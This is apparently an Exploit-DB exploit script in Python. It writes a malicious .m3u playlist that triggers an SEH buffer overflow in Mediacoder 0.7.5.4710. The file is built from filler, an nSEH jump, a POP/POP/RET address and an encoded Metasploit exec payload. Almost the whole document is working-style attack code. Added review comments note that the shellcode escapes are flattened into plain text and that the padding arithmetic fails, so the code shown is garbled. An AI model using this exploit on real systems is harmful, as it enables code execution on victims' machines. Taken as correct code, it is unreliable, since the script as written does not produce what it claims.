
# Title : Mediacoder 0.7.5.4710 "Universal" SEH Buffer Overflow Exploit
# Published : 2010-08-12
# Author : Dr_IDE


#!/usr/bin/env python

#################################################################
#
# Mediacoder 0.7.5.4710 "Universal" SEH Buffer Overflow Exploit
# Coded By:     Dr_IDE
# Found By:	abhishek lyall
# Usage:        Load the evil .m3u file and click on it.
# Download:     http://www.exploit-db.com/application/14612
# Tested On:    Windows XPSP3
#
#################################################################

# windows/exec - 534 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe

# Payload blob.  The header comment above describes it as a Metasploit
# windows/exec payload (CMD=calc.exe, x86/shikata_ga_nai encoded, 534 bytes).
# NOTE(review): as transcribed on this page the byte escapes are flattened --
# every "xNN" group is three ordinary characters, not one byte -- so len(code)
# is roughly 900, and everything written by this script is plain ASCII text.
# The byte-count comments and the padding arithmetic below do not describe
# what the file actually contains.
code = (
"x89xe6xdaxdbxd9x76xf4x58x50x59x49x49x49x49"
"x43x43x43x43x43x43x51x5ax56x54x58x33x30x56"
"x58x34x41x50x30x41x33x48x48x30x41x30x30x41"
"x42x41x41x42x54x41x41x51x32x41x42x32x42x42"
"x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4b"
"x58x50x44x45x50x43x30x43x30x4cx4bx51x55x47"
"x4cx4cx4bx43x4cx45x55x43x48x45x51x4ax4fx4c"
"x4bx50x4fx45x48x4cx4bx51x4fx47x50x45x51x4a"
"x4bx51x59x4cx4bx50x34x4cx4bx45x51x4ax4ex50"
"x31x49x50x4dx49x4ex4cx4cx44x49x50x42x54x43"
"x37x49x51x49x5ax44x4dx43x31x48x42x4ax4bx4b"
"x44x47x4bx51x44x47x54x45x54x42x55x4bx55x4c"
"x4bx51x4fx46x44x43x31x4ax4bx42x46x4cx4bx44"
"x4cx50x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4c"
"x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx51"
"x34x45x54x48x43x51x4fx50x31x4ax56x43x50x51"
"x46x45x34x4cx4bx47x36x46x50x4cx4bx47x30x44"
"x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx43x58x45"
"x58x4bx39x4bx48x4bx33x49x50x43x5ax46x30x42"
"x48x4ax50x4cx4ax44x44x51x4fx42x48x4ax38x4b"
"x4ex4dx5ax44x4ex51x47x4bx4fx4ax47x42x43x45"
"x31x42x4cx45x33x45x50x41x41")

# The two 4-byte slots of an SEH record as the title and variable names
# describe them (next-SEH pointer, then handler address -- see the P/P/R note
# on retn).  Same transcription caveat: each is a 12-character string here,
# not 4 bytes.
nseh = ("xEBx06xFFxFF")
retn = ("xC0x57x01x66")	#"Universal" P/P/R libconv-2.dll
# Filler around the record.  "x90", "x41" and "x44" are 3-character strings,
# so buff alone is 764 * 3 = 2292 characters -- already more than the 2000 the
# junk line tries to pad the total to.  2000 - len(...) is therefore negative,
# str * negative_int evaluates to "", and junk is the empty string.
nops = ("x90" * 12)
buff = ("x41" * 764)
junk = ("x44" * (2000-len(buff+nseh+retn+nops+code)))
 
# Write the assembled playlist to the current working directory.  Text mode
# ('w') as in the original; the context manager closes the handle instead of
# an explicit close(), and the builtin name `file` is no longer shadowed.
# Detection note: the artifact is a .m3u consisting of long runs of a repeated
# short token followed by the four fixed parts above -- a playlist parser has
# no legitimate reason to see thousands of identical bytes before any entry.
with open('dr_ide_SEH.m3u', 'w') as playlist:
    playlist.write(buff + nseh + retn + nops + code + junk)